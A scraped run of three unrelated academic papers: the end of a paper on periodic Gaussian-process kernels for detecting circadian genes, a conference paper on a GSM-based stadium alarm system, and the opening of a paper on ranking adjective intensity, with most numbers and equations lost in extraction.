partial knowledge given by the observations can durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. be dealt with elegantly. previous theoretical results from the mid- s allowed us to derive the expressions of the inner product of rkhs based on matérn kernels. given these results, it was then possible to define a periodic kernel kp and to decompose k as a sum of sub-kernels k=kp+ka. we illustrated three fundamental features of the proposed kernels for gaussian process modelling. first, as we have seen on the benchmark examples, they allowed us to approximate periodic non-sinusoidal patterns while retaining appropriate filtering of the noise. second, they provided a natural decomposition of the gaussian process model as a sum of periodic and aperiodic sub-models. third, they can be reparametrised to define a wider family of kernel which is of particular interest for decoupling the assumptions on the behaviour of the periodic and aperiodic part of the signal. the probabilistic interpretation of the decomposition in sub-models is of great importance when it comes to define a criterion that quantifies the periodicity of f while taking into account the uncertainty about it. this goal was achieved by applying methods commonly used in gaussian process based sensitivity analysis to define a periodicity ratio. although the proposed method can be applied to any time series data, this work has originally been motivated by the detection of periodically expressed genes. in practice, listing such genes is a key step for a better understanding of the circadian clock mechanism at the gene level. the effectiveness of the method is illustrated on such data in the last section. the results we obtained are consistent with the literature but they also feature some new genes with a strong periodic component. this suggests that the approach described here is not only theoretically elegant but also efficient in practice. 
as a final remark, we would like to stress that the proposed method is fully compatible with all the features of gaussian processes, from the combination of one-dimensional periodic kernels to obtain periodic kernels in higher dimension to the use of sparse methods when the number of observation becomes large. by implementing our new method within the gpy package for gaussian process inference we have access to these generalisations along with effective methods for parameter estimation. an interesting future direction would be to incorporate the proposed kernel into the ‘automated statistician’ project (lloyd et al., ; duvenaud et al., ), which searches over grammars of kernels. appendix a. details on test functions the test functions shown in fig. are -periodic. their expressions for x ∈[ , ) are (from top left, in a clockwise order): f (x)=cos( πx) f (x)= / cos( πx)+ / cos( πx) f (x)= { if x ∈[ , . ] − if x ∈( . , ) f (x)= |x− . |+ f (x)= − x f (x)= . ( ) durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. appendix b. norms in matÉrn rkhs autoregressive processes and rkhs norms a process is said to be autoregressive (ar) if the spectral density of the kernel s(ω)= π ∫ r k(t)e−iωt dt ( ) can be written as a function of the form s(ω)= ∣∣∑m k= αk(iω) k ∣∣ ( ) where the polynomial ∑m k= αkx k is real with no zeros in the right half of the complex plan doob ( ). hereafter we assume that m≥ and that α ,αm = . for such kernels, the inner product of the associated rkhs h is given by hájek ( ), kailath ( ) and parzen ( ) 〈 h,g 〉 h= ∫ b a (lt h)(lt g)dt+ ∑ ≤j,k≤m− j+k even dj,kh (j)(a)g(k)(a) ( ) where lt h= m∑ k= αkh (k)(t) and dj,k = min(j,k)∑ i=max( ,j+k+ −n) (− )(j−i)αiαj+k+ −i. we show in the next section that the matérn kernels correspond to autoregressive kernels and, for the usual values of ν, we derive the norm of the associated rkhs. application to matérn kernels following the pattern exposed in doob ( , p. ), the spectral density of a matérn kernel (eq. ( )) can be written as the density of an ar process when ν+ / is an integer. indeed, the roots of the polynomial ν ` +ω are conjugate pairs so it can be expressed as the squared module of a complex number ν ` +ω = ( ω+ i √ ν ` )( ω− i √ ν ` ) = ∣∣∣∣ω+ i √ ν ` ∣∣∣∣ . ( ) multiplying by i and taking the conjugate of the quantity inside the module, we finally obtain a polynomial in iω with all roots in the left half of the complex plan: ν ` +ω = ∣∣∣∣iω+ √ ν ` ∣∣∣∣ ⇒ ( ν ` +ω )(ν+ / ) = ∣∣∣∣∣∣ (√ ν ` +iω )(ν+ / )∣∣∣∣∣∣ . ( ) plugging this expression into eq. ( ), we obtain the desired expression of sν: sν(ω)= ∣∣∣∣√ (ν)` ν σ √π (ν+ / )( ν)ν (√ ν` +iω)(ν+ / ) ∣∣∣∣ . ( ) durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. using (ν)= ( ν− )! √ π ν− (ν− / )!, one can derive the following expression of the coefficients αk: αk = √ ( ν− )!νν σ (ν− / )! ν ckν+ / ( ` √ ν )k− / . ( ) theses values of αk can be plugged into eq. ( ) to obtain the expression of the rkhs inner product. the results for ν∈{ / , / , / } is given by eqs. ( )–( ) in the main body of the article. additional information and declarations funding support was provided by the biopredynproject (knowledge based bio-economy eu grant ref ) and the bbsrc grant bb/ / . james hensman was funded by an mrc career development fellowship. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. 
grant disclosures the following grant information was disclosed by the authors: biopredynproject: ref . bbsrc: bb/ / . competing interests the authors declare there are no competing interests. author contributions • nicolas durrande and james hensman conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • magnus rattray and neil d. lawrence conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/sheffieldml. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references amaral i, johnston i. . circadian expression of clock and putative clock- controlled genes in skeletal muscle of the zebrafish. american journal of physiology ( ):r –r doi . /ajpregu. . . durrande et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/sheffieldml http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /ajpregu. . http://dx.doi.org/ . /peerj-cs. aronszajn n. . theory of reproducing kernels. transactions of the american mathematical society ( ): – doi . /s - - - - . berlinet a, thomas-agnan c. . reproducing kernel hilbert spaces in probability and statistics. dordrecht: kluwer academic publishers. ding z, doyle mr, amasino rm, davis sj. . a complex genetic interaction between arabidopsis thaliana toc and cca /lhy in driving the circadian clock and in output regulation. genetics ( ): – doi . /genetics. . . doob jl. . stochastic processes. vol. . new york: john wiley & sons. durrande n, ginsbourger d, roustant o. . additive covariance kernels for high- dimensional gaussian process modeling. annales de la faculté des sciences de toulouse xxi: – . duvenaud d, lloyd j, grosse r, tenenbaum j, zoubin g. . structure discovery in nonparametric regression through compositional kernel search. in: proceedings of the th international conference on machine learning, – . edwards kd, anderson pe, hall a, salathia ns, locke jcw, lynn jr, straume m, smith jq, millar aj. . flowering locus c mediates natural variation in the high-temperature response of the arabidopsis circadian clock. the plant cell online ( ): – doi . /tpc. . . hájek j. . on linear statistical problems in stochastic processes. czechoslovak mathematical journal ( ): – . hartley ho. . tests of significance in harmonic analysis. biometrika ( ): – doi . /biomet/ . - . . hughes m, ditacchio l, hayes k, vollmers c, pulivarthy s, baggs j, panda s, ho- genesch j. . harmonics of circadian gene transcription in mammals. plos genetics ( ):e doi . /journal.pgen. . kailath t. . rkhs approach to detection and estimation problems–i: deterministic signals in gaussian noise. ieee transactions on information theory ( ): – doi . /tit. . . leahy da, darbro w, elsner rf, weisskopf mc, kahn s, sutherland pg, grindlay je. . on searches for pulsed emission with application to four globular cluster x- ray sources-ngc , , , and . astrophysical journal : – doi . / . lloyd jr, duvenaud d, grosse r, tenenbaum j, ghahramani z. . 
automatic construction and natural-language description of nonparametric regression models. in: twenty-eighth aaai conference on artificial intelligence. palo alto: association for the advancement of artificial intelligence.
marrel a, iooss b, laurent b, roustant o. calculations of sobol indices for the gaussian process metamodel. reliability engineering & system safety.
matheron g. principles of geostatistics. economic geology.
oakley je, o'hagan a. probabilistic sensitivity analysis of complex models: a bayesian approach. journal of the royal statistical society: series b (statistical methodology).
parzen e. an approach to time series analysis. the annals of mathematical statistics.
porcu e, stein ml. on some local, global and regularity behaviour of some classes of covariance functions. berlin, heidelberg: springer.
rasmussen ce, williams c. gaussian processes for machine learning. cambridge: mit press.
scheuerer m, schaback r, schlather m. interpolation of spatial data—a stochastic or a deterministic problem? technical report, universität göttingen.
schuster a. on the investigation of hidden periodicities with application to a supposed day period of meteorological phenomena. terrestrial magnetism.
stein ml. interpolation of spatial data: some theory for kriging. berlin, heidelberg: springer.
stellingwerf rf. period determination using phase dispersion minimization. astrophysical journal.
straume m. dna microarray time series analysis: automated statistical assessment of circadian rhythms in gene expression patterning. methods in enzymology.
thomson w. harmonic analyzer. proceedings of the royal society of london.
troutman bm. some results in periodic autoregression. biometrika.
vecchia av. maximum likelihood estimation for periodic autoregressive moving average models. technometrics.
wahba g. spline models for observational data. philadelphia: society for industrial and applied mathematics.
wendland h. scattered data approximation. cambridge: cambridge university press.
international conference on sensor network and computer engineering (icsnce)

multi-function monitoring and alarm system for the large stadium

wang xiaohui, school of leisure management, xi'an eurasia university, xi'an, china, e-mail: wangxiaohui@eurasia.edu
dou xiaoning, school of leisure management, xi'an eurasia university, xi'an, china, e-mail: douxiaoning@eurasia.edu

abstract: in recent years, the safety of large stadiums has attracted growing attention from researchers. especially during large sporting events, stadium safety has become an important public concern. this paper designs a multi-function monitoring and alarm system based on the mobile communication network. it provides smoke or combustible-gas alarms, infrared presence detection, and temperature alarms. the system collects data through its sensors and sends the data to the user's mobile phone or to the control platform. it is simple, convenient, safe, versatile, and low-cost.

keywords: sensor; wireless transmission; alarm; mcu; gsm

i. introduction
to address the safety problems of large sports venues, this paper introduces a multi-function alarm system based on a wireless communication system [ ]. it can provide smoke or combustible-gas, infrared, and temperature alarms for the stadium. through the sensors and the wireless communication module, the collected data is sent to the user or to the main control platform. the hardware comprises a minimum system built around an stc-series single-chip microcontroller, a sensor circuit composed of the ds b temperature sensor, the hc-sr infrared module and the mq- smoke sensor, a gsm communication module, and an lcd display circuit. the software includes the main program, the gsm sms transceiver program, the display program, and the temperature detection program [ ].

ii. overall design of the system
a. the system function block
the hardware system consists of the mcu minimum system, the gsm module, the display circuit, the buzzer control circuit, and the sensor circuit [ ]. the sensor circuit is composed of three parts: smoke detection, human infrared detection, and temperature detection. the overall structure is shown in the system block diagram figure (clock and reset circuits around the mcu, connected to the gsm module, the display circuit, the buzzer alarm control circuit, and the smoke, infrared and temperature detection circuits). when any of the three sensors detects smoke, a human body, or a high temperature, the alarm information is sent to the microcontroller. the microcontroller judges whether the reading exceeds its threshold, drives the buzzer circuit, and the gsm module then sends an alarm message to the user. b.
the design of the minimum system the minimum system of single chip microcomputer is composed of single chip microcomputer, crystal oscillator circuit and reset circuit[ ]. as shown in figure . p p p p p p p p p /rxd p /t p /txd p /int p /int p /t x reset x p p p p p p p p p p p p p p p p ea/vpp rd/p wr/p ale/prdg psen c pf c pf c pf x mhz l r . k stc c + + + figure . minimum system of the single chip. the principle of reset circuit is to reset the program manually when pressing the button, reset the program, and international conference on sensor network and computer engineering (icsnce ) restart it. in the crystal oscillator circuit, x provides oscillating signal for the crystal oscillator to the microcontroller, and the mcu runs into the running program. c. example sensor detection circuit ) temperature detection. the temperature of the environment is collected by ds b and the collected information is sent to the circuit through the interface. the temperature range is - ℃ ~+ ℃. the increment is . ℃ and the temperature can be turned into a number. the mcu can read the temperature directly. this temperature sensor reduces the external circuit and makes it easier to realize[ ]. the ds b consists of four parts: the bits rom with the single-wire interface, the temperature sensor, the temperature trigger and the configuration register. its structure is shown in figure . memory and controller bits rom and single-wire interface bits crc generator configuration register high temperature trigger low temperature trigger temperature sensor high speed cache memory figure . the internal block of ds b . through the single bus protocol, the single chip microcontroller reads the data and operations from the ds b . finally it is concluded the temperature value. the resistor in the circuit used for the pull-up, it has the ability of the anti-interference. ) smoke and combustible gas detection. the mq- smoke sensor is a kind of the air sensitive material with the tin oxide. it has the low conductivity in the clean air[ ]. therefore, in the surrounding environment, the conductivity of the sensor increases with the increase in the presence of the smoke or the combustible gas. lm is the operational amplifier which is used as a voltage comparator. when the input voltage v+ > v-, the output is high and the output is low when v- > v+. the mq- is the smoke sensor. in mq- , r and rv constitute the circuit. rv is a sliding resistor which adjusts the input voltage of lm . in general, when v+ >v-, outputs the high level. when the mq- detects the smoke or the combustible gas, its resistance decreases and the voltage is smaller, the v- voltage changed higher, so that the v+<v-. the lm outputs the low level, the light emitting diode conducts. the single chip microcomputer detects the low level, so as to start the alarm. the detection circuit of the smoke and combustible gas is shown in figure : lm out + - gnd vcc rv k r k r rv k r . k d c a h a b h b mq- vcc vcc figure . the circuit of the smoke and the combustible gas. ) human infrared detection with the hc-sr module, the system detects the human body. when the human body passes through the infrared detection zone, the mcu outputs the trigger signal to the wireless module. when no one is unmanned, the mcu is used to detect the high level through the pull resistance[ ]. hc-sr a gnd c a r sw r k k r q npn d vcc figure . the infrared detection circuit. hc-sr is the human body induction module. when it detects the human body, pin a outputs the high level. 
through the current limiting resistor, q turns on and the collector connects to the gnd and then switched to the low level. at this time, the light emitting diode conducts and the led lighting. the single chip microcomputer detects the low level and begins an alarm. in the circuit, the capacitance used as the filter, r is the pull-up resistor. when there is no person, the q turns off. the single chip microcomputer can detect the high level by the pull-up resistor. iii. software system design a. main program design the software of this system is designed with a single chip system program as the main program, and the sensor module international conference on sensor network and computer engineering (icsnce ) program is designed as the subroutine[ ]. the main program flow is shown in figure . start mcu initialization module initialization smoke detection detected smoke (y/n) send sms y end detected human (y/n) send sms send sms y y n temperature detection temperature >threshold infrared detection n n figure . main program of the systemm. at first, the mcu initializes and then the temperature module, the human infrared module and the smoke alarm module are also initialized. if the system detects the smoke, sends the message to the mobile phone or determines whether the temperature exceeds the threshold value. if it exceeds it, send data to the user or judge the results of the human detected. if detects the human body sends the data to the mobile phone or not. b. gsm module program design the program design of this part is the design of serial communication of gsm[ ]. first, port, baud rate, parity bit, data bit and so on are first set up, then the short message is sent by tc at command. the flow of its program is shown in figure . start mcu iniatialization module iniatialization com interrupt end receive“ring” send the command“ath” delay send message receive #open# relay turn on led turn on receive #close# relay turn off led turn off y n n n n y y y figure . tc module program flow chart. the program began, gsm module initialization, serial port to determine whether to interrupt if the serial interrupt, and then determine whether to receive the "ring" command, if the received command is sent on command, if not to receive orders and then to determine whether the received switch command, if the #open# is received, the control relay is closed, led lights, if received the #close# command, control relay off, led lamp. iv. test result and data analysis when the system detects the data exceeds the threshold, the gsm module begin works. it send sms to the user or the main platform, which could transmit the data in time. in order to display the test results, uses the screen results of the mobile phone in figure . figure . gsm sending sms. users can send “open” and “close” command to control the working status of the system. if the “open” international conference on sensor network and computer engineering (icsnce ) command is send, the led turns on. when sending “close” command the led turns off. it proved the gsm module could receive short message successfully. the test result is shown in figure . figure . gsm receiving sms v. conclusions in this paper, the multi-function alarm system could detect the smoke or combustible gas, the infrared identification and the temperature by the multi-point sensor in the large stadium. the collected data transmitted by the mobile communication to the mobile phone or the main platform. 
the system is simple and cheap, it has various functions for the monitoring system conveniently. acknowledgment this work was partly supported by shaanxi province social science fund project (no. r ) of china and by the scientific research fund project of shaanxi provincial department of education ( jk ). references [ ] f.cappella, v.caracciolo, and r.cerulli, et al. “the calibration and the monitoring/alarm system”, international journal of modern physics a, vol. , nov. , pp. - , doi:org/ . /s x [ ] t.hamaguchi, h.sakashita, and h.moritani, et al. “method for designing alarm system using daes, ce matrices, and preference indices”, journal of chemical engineering of japan, vol. , jun, , pp. - , doi:org/ . /jcej. we [ ] s.romero-brufau, b. w.morlan, and m.johnson, et al. “evaluating automated rules for rapid response system alarm triggers in medical and surgical patients”, journal of hospital medicine, vol. , nov. , pp. - ,doi: . /jhm. . [ ] y.jie, h.zhu, and x.cao. “one-piece triboelectric nanosensor for self-triggered alarm system and latent fingerprint detection”, acs nano, vol. , oct. , pp. - , doi: . /acsnano. b . [ ] y.jiang, g.li, and j.wang . “photoacoustic compound fire alarm system for detecting particles and carbon monoxide in smoke”, fire technology, vol. ,may. , pp. - , doi:org/ . /s - - - . [ ] s.fong, r.wong, and a. v.vasilakos. “accelerated pso swarm search feature selection for data stream mining big data”, ieee transactions on services computing, vol. , dec. , pp. - , doi: . /tsc. . . [ ] a. o.gaca, p.kudrin, and c.colomer-winter, et al. “from (p)ppgpp to (pp)pgpp: characterization of regulatory effects of pgpp synthesized by the small alarmone synthetase of enterococcus faecalis”, journal of bacteriology, vol. , oct. , pp. .doi: . /jb. - . [ ] t.jones, l.glass, and s.gandhi, et al. “madagascar's mangroves: quantifying nation-wide and ecosystem specific dynamics, and detailed contemporary mapping of distinct ecosystems”, remote sensing, vol. ,feb. , pp. ,doi: . /rs . [ ] a. s.crunchant, m.egerer, and a.loos, et al. “automated face detection for occurrence and occupancy estimation in chimpanzees”, american journal of primatology, vol. ,may. , pp. - .doi: . /ajp. . https://doi.org/ . /s x https://doi.org/ . /jcej. we https://doi.org/ . /acsnano. b https://doi.org/ . /tsc. . http://dx.doi.org/ . /jb. - http://dx.doi.org/ . /rs http://dx.doi.org/ . /ajp. transactions of the association for computational linguistics, ( ) – . action editor: lillian lee. submitted / ; revised / ; published / . c© association for computational linguistics. good, great, excellent: global inference of semantic intensities gerard de melo icsi, berkeley demelo@icsi.berkeley.edu mohit bansal cs division, uc berkeley mbansal@cs.berkeley.edu abstract adjectives like good, great, and excellent are similar in meaning, but differ in intensity. in- tensity order information is very useful for language learners as well as in several nlp tasks, but is missing in most lexical resources (dictionaries, wordnet, and thesauri). in this paper, we present a primarily unsupervised approach that uses semantics from web-scale data (e.g., phrases like good but not excel- lent) to rank words by assigning them posi- tions on a continuous scale. we rely on mixed integer linear programming to jointly deter- mine the ranks, such that individual decisions benefit from global information. 
when rank- ing english adjectives, our global algorithm achieves substantial improvements over pre- vious work on both pairwise and rank corre- lation metrics (specifically, % pairwise ac- curacy as compared to only % by previous work). moreover, our approach can incorpo- rate external synonymy information (increas- ing its pairwise accuracy to %) and extends easily to new languages. we also make our code and data freely available. introduction current lexical resources such as dictionaries and thesauri do not provide information about the in- tensity order of words. for example, both wordnet (miller, ) and roget’s st century thesaurus (thesaurus.com) present acceptable, great, and su- perb as synonyms of the adjective good. however, a native speaker knows that these words represent varying intensity and can in fact generally be ranked by intensity as acceptable < good < great < superb. similarly, warm < hot < scorching are identified as synonyms in these resources. ranking information, http://demelo.org/gdm/intensity/ however, is crucial because it allows us to differen- tiate e.g. between various intensities of an emotion, and is hence very useful for humans when learning a language or judging product reviews, as well as for automatic text understanding and generation tasks such as sentiment and subjectivity analysis, recog- nizing textual entailment, question answering, sum- marization, and coreference and discourse analysis. in this work, we attempt to automatically rank sets of related words by intensity, focusing in par- ticular on adjectives. this is made possible by the vast amounts of world knowledge that are now avail- able. we use lexico-semantic information extracted from a web-scale corpus in conjunction with an al- gorithm based on a mixed integer linear program (milp). linguistic analyses have identified phrases such as good but not great or hot and almost scorch- ing in a text corpus as sources of evidence about the relative intensities of words. however, pure infor- mation extraction approaches often fail to provide enough coverage for real-world downstream appli- cations (tandon and de melo, ), unless some form of advanced inference is used (snow et al., ; suchanek et al., ). in our work, we address this sparsity problem by relying on web-scale data and using an milp model that extends the pairwise scores to a more com- plete joint ranking of words on a continuous scale, while maintaining global constraints such as transi- tivity and giving more weight to the order of word pairs with higher corpus evidence scores. instead of considering intensity ranking as a pairwise deci- sion process, we thus exploit the fact that individual decisions may benefit from global information, e.g. about how two words relate to some third word. previous work (sheinman and tokunaga, ; schulam and fellbaum, ; sheinman et al., ) has also used lexico-semantic patterns to or- der adjectives. they mainly evaluate their algorithm on a set of pairwise decisions, but also present a par- titioning approach that attempts to form scales by placing each adjective to the left or right of pivot words. unfortunately, this approach often fails be- cause many pairs lack order-based evidence even on the web, as explained in more detail in section . in contrast, our milp jointly uses information from all relevant word pairs and captures com- plex interactions and inferences to produce inten- sity scales. 
we can thus obtain an order between two adjectives even when there is no explicit evi- dence in the corpus (using evidence for related pairs and transitive inference). our global milp is flex- ible and can also incorporate additional synonymy information if available (which helps the milp find an even better ranking solution). our approach also extends easily to new languages. we describe two approaches for this multilingual extension: pattern projection and cross-lingual milps. we evaluate our predicted intensity rankings us- ing both pairwise classification accuracy and rank- ing correlation coefficients, achieving strong results, significantly better than the previous approach by sheinman & tokunaga ( % relative error reduc- tion) and quite close to human-level performance. method in this section, we describe each step of our ap- proach to ordering adjectives on a single, relative scale. our method can also be applied to other word classes and to languages other than english. . web-based scoring model . . intensity scales near-synonyms may differ in intensity, e.g. joy vs. euphoria, or drizzle vs. rain. this is particu- larly true of adjectives, which can represent different degrees of a given quality or attribute such as size or age. many adjectives are gradable and thus al- low for grading adverbial modifiers to express such intensity degrees, e.g., a house can be very big or extremely big. often, however, completely differ- ent adjectives refer to varying degrees on the same scale, e.g., huge, gigantic, gargantuan. even adjec- tives like enormous (or superb, impossible) that are considered non-gradable from a syntactic perspec- tive can be placed on a such a scale. weak-strong patterns strong-weak patterns ? (,) but not ? not ? (,) just ? ? (,) if not ? not ? (,) but just ? ? (,) although not ? not ? (,) still ? ? (,) though not ? not ? (,) but still ? ? (,) (and/or) even ? not ? (,) although still ? ? (,) (and/or) almost ? not ? (,) though still ? not only ? but ? ? (,) or very ? not just ? but ? table : ranking patterns used in this work. among the patterns represented by the regular expressions above, we use only those that capture less than or equal to five words (to fit in the google n-grams, see section . . ). articles (a, an, the) are allowed to appear before the wildcards wherever possible. . . intensity patterns linguistic studies have found lexical patterns like ‘? but not ?’ (e.g. good but not great) to reveal order information between a pair of adjectives (sheinman and tokunaga, ). we assume that we have two sets of lexical patterns that allow us to infer the most likely ordering between two words when encoun- tered in a corpus. a first pattern set, pws, contains patterns that reflect a weak-strong order between a pair of word (the first word is weaker than the sec- ond), and a second pattern set, psw, captures the strong-weak order. see table for the adjective pat- terns that we used in this work (and see section . for implementation details regarding our pattern col- lection). many of these patterns also apply to other parts of speech (e.g. ‘drizzle but not rain’, ‘running or even sprinting’), with significant discrimination on the web in the right direction. . . pairwise scores given an input set of words to be placed on a scale, we first collect evidence of their intensity or- der by using the above-mentioned intensity patterns and a large, web-scale text corpus. 
previous work on information extraction from limited-sized raw text corpora revealed that coverage is often limited (hearst; hatzivassiloglou and mckeown). some studies (chklovski and pantel; sheinman and tokunaga) used hit counts from an online search engine, but these are unstable and irreproducible (kilgarriff). to avoid these issues, we use the largest available static corpus of counts, the google n-grams corpus (brants and franz), which contains english n-grams (n = 1 to 5) and their observed frequency counts, generated from roughly one trillion word tokens and many billions of sentences of web text.

table: some examples of useful intensity-based phrases on adjective pairs found in the web-scale corpus. for (good, great): "good, but not great", "good, if not great", "good, though not great", "good, or even great", "good, almost great". for (great, good): "not great, just good", "great or very good", "not great but still good", "not just good but great". for (small, minute): "small, almost minute", "small, even minute".

we consider each pair of words $(a_1, a_2)$ in the input set in turn. for each pattern $p$ in the two pattern sets (weak-strong $P_{ws}$ and strong-weak $P_{sw}$), we insert the word pair into the pattern as $p(a_1, a_2)$ to get a phrasal query like "big but not huge". this is done by replacing the two wildcards in the pattern by the two words in order. finally, we scan the web n-grams corpus in a batch approach similar to bansal and klein and collect frequencies of all our phrase queries. the table above depicts some examples of useful intensity-based phrase queries in the web-scale corpus. we also collect frequencies for the input word unigrams and the patterns for normalization purposes. given a word pair $(a_1, a_2)$ and a corpus count function $\mathrm{cnt}$, we define

$W_1 = \frac{1}{P_1}\sum_{p \in P_{ws}} \mathrm{cnt}(p(a_1,a_2))$, \quad $S_1 = \frac{1}{P_2}\sum_{p \in P_{sw}} \mathrm{cnt}(p(a_1,a_2))$,
$W_2 = \frac{1}{P_1}\sum_{p \in P_{ws}} \mathrm{cnt}(p(a_2,a_1))$, \quad $S_2 = \frac{1}{P_2}\sum_{p \in P_{sw}} \mathrm{cnt}(p(a_2,a_1))$,

with $P_1 = \sum_{p \in P_{ws}} \mathrm{cnt}(p)$ and $P_2 = \sum_{p \in P_{sw}} \mathrm{cnt}(p)$, such that the final overall weak-strong score is

$\mathrm{score}(a_1,a_2) = \dfrac{(W_1 - S_1) - (W_2 - S_2)}{\mathrm{cnt}(a_1)\cdot \mathrm{cnt}(a_2)}$.

here $W_1$ and $S_1$ represent web evidence of $a_1$ and $a_2$ being in the weak-strong and strong-weak relation, respectively. $W_2$ and $S_2$ fit the reverse pair $(a_2, a_1)$ into the patterns and hence represent the strong-weak and weak-strong relations, respectively, in the opposite direction. hence, overall, $(W_1 - S_1) - (W_2 - S_2)$ represents the total weak-strong score of the pair $(a_1, a_2)$, i.e. the score of $a_1$ being on the left of $a_2$ on a relative intensity scale, such that $\mathrm{score}(a_2,a_1) = -\mathrm{score}(a_1,a_2)$. the raw frequencies in the score are divided by the counts of the patterns and by the individual word unigram counts to obtain a pointwise mutual information (pmi) style normalization and hence avoid any bias due to high-frequency patterns or word unigrams.

global ordering with an milp: objective and constraints. given pairwise scores, we now aim at producing a global ranking of the input words that is much more informative than the original pairwise scores. joint inference from multiple word pairs allows us to benefit from global information: due to the sparsity of the pattern evidence, how two adjectives relate to each other can sometimes only be inferred by observing how each of them relates to some third adjective. we assume that we are given $n$ input words $A = a_1, \ldots, a_n$ that we wish to place on a linear scale, say $[0,1]$. thus each word $a_i$ is to be assigned a position $x_i \in [0,1]$ based on the pairwise weak-strong weights $\mathrm{score}(a_i, a_j)$.
(footnote: in preliminary experiments on a development set, we also evaluated other intuitive forms of normalization.)

figure: the input weak-strong data may contain one or more cycles, e.g. due to noisy patterns, so the final ranking will have to choose which input scores to honor and which to remove.

a positive value for $\mathrm{score}(a_i,a_j)$ means that $a_i$ is supposedly weaker than $a_j$ and hence we would like to obtain $x_i < x_j$. a negative value for $\mathrm{score}(a_i,a_j)$ means that $a_i$ is assumed to be stronger than $a_j$, so we would want to obtain $x_i > x_j$. therefore, intuitively, our goal corresponds to maximizing the objective

$\sum_{i,j} \mathrm{sgn}(x_j - x_i) \cdot \mathrm{score}(a_i, a_j)$.

note that it is important to use the signum function $\mathrm{sgn}(\cdot)$ here, because we only care about the relative order of $x_i$ and $x_j$. maximizing $\sum_{i,j} (x_j - x_i) \cdot \mathrm{score}(a_i,a_j)$ instead would lead to all words being placed at the edges of the scale, because the highest scores would dominate over all other ones. we do include the score magnitudes in the objective, because they help resolve contradictions in the pairwise scores (e.g., see the cycle figure above); this is discussed in more detail below. (to avoid numeric instability due to very small score values after frequency normalization, in practice we rescale the scores relative to the smallest nonzero $|\mathrm{score}(a_i,a_j)|$.)

in order to maximize this non-differentiable objective, we use mixed integer linear programming (milp), a variant of linear programming in which some but not all of the variables are constrained to be integers. using an milp formalization, we can find a globally optimal solution in the joint decision space, and unlike previous work, we jointly exploit global information rather than just individual local (pairwise) scores. to encode the objective in an milp, we need to introduce additional variables $d_{ij}$, $w_{ij}$, $s_{ij}$ to capture the effect of the signum function, as explained below. we additionally enable our milp to make use of any external equivalence (synonymy) information $E \subseteq \{1,\ldots,n\} \times \{1,\ldots,n\}$ that may be available. in this context, two words are considered synonymous if they are close enough in meaning to be placed on (almost) the same position on the intensity scale. if $(i,j) \in E$, we can safely assume that $a_i$, $a_j$ have near-equivalent intensity, so we should encourage $x_i$, $x_j$ to remain close to each other. the milp is defined as follows:

maximize $\sum_{(i,j) \notin E} (w_{ij} - s_{ij}) \cdot \mathrm{score}(a_i,a_j) \; - \; \sum_{(i,j) \in E} (w_{ij} + s_{ij}) \cdot C$

subject to, for all $i,j \in \{1,\ldots,n\}$:
$d_{ij} = x_j - x_i$, \quad $d_{ij} - w_{ij} C \le 0$, \quad $d_{ij} + (1 - w_{ij}) C > 0$, \quad $d_{ij} + s_{ij} C \ge 0$, \quad $d_{ij} - (1 - s_{ij}) C < 0$,
$x_i \in [0,1]$, \quad $w_{ij} \in \{0,1\}$, \quad $s_{ij} \in \{0,1\}$.

the difference variables $d_{ij}$ simply capture the differences between $x_i$ and $x_j$. $C$ is any very large constant greater than $\sum_{i,j} |\mathrm{score}(a_i,a_j)|$; the exact value is irrelevant. the indicator variables $w_{ij}$ and $s_{ij}$ are jointly used to determine the value of the signum function $\mathrm{sgn}(d_{ij}) = \mathrm{sgn}(x_j - x_i)$. the variables $w_{ij}$ become 1 if and only if $d_{ij} > 0$ and hence serve as indicator variables for weak-strong relationships in the output. the variables $s_{ij}$ become 1 if and only if $d_{ij} < 0$ and hence serve as indicator variables for strong-weak relationships in the output. the objective encourages $w_{ij} = 1$ for $\mathrm{score}(a_i,a_j) > 0$ and $s_{ij} = 1$ for $\mathrm{score}(a_i,a_j) < 0$. when equivalence (synonymy) information is available, then for $(i,j) \in E$ both $w_{ij} = 0$ and $s_{ij} = 0$ are encouraged.

discussion. our milp uses intensity evidence of all input pairs together and assimilates all the scores via global transitivity constraints to determine the positions of the input words on a continuous real-valued scale. hence, our approach addresses drawbacks
hence, our approach addresses drawbacks in order to avoid numeric instability issues due to very small score(ai, aj) values after frequency normalization, in practice we have found it necessary to rescale them by a fac- tor of over the smallest |score(ai, aj)| > . figure : equivalence information: knowing that am, a are synonyms gives the milp an indication of where to place an on the scale with respect to a , a , a of local or divide-and-conquer approaches, where adjectives are scored with respect to selected pivot words, and hence many adjectives that lack pairwise evidence with the pivots are not properly classified, although they may have order evidence with some third adjective that could help establish the ranking. optional synonymy information can further help, as shown in figure . moreover, our milp also gives higher weight to pairs with higher scores, which is useful when breaking global constraint cycles as in the simple example in figure . if we need to break a con- straint violating triangle or cycle, we would have to make arbitrary choices if we were ranking based on sgn(score(a,b)) alone. instead, we can choose a better ranking based on the magnitude of the pair- wise scores. a stronger score between an adjective pair doesn’t necessarily mean that they should be further apart in the ranking. it means that these two words are attested together on the web with respect to the intensity patterns more than with other candi- date words. therefore, we try to respect the order of such word pairs more in the final ranking when we are breaking constraint-violating cycles. related work hatzivassiloglou and mckeown ( ) presented the first step towards automatic identification of ad- jective scales, thoroughly discussing the background of adjective semantics and a means of discovering clusters of adjectives that belong on the same scale, thus providing one way of creating the input for our ranking algorithm. inkpen and hirst ( ) study near-synonyms and nuances of meaning differentiation (such as stylistic, attitudinal, etc.). they attempt to automatically ac- quire a knowledge base of near-synonym differences via an unsupervised decision-list algorithm. how- ever, their method depends on a special dictionary of synonym differences to learn the extraction pat- terns, while we use only a raw web-scale 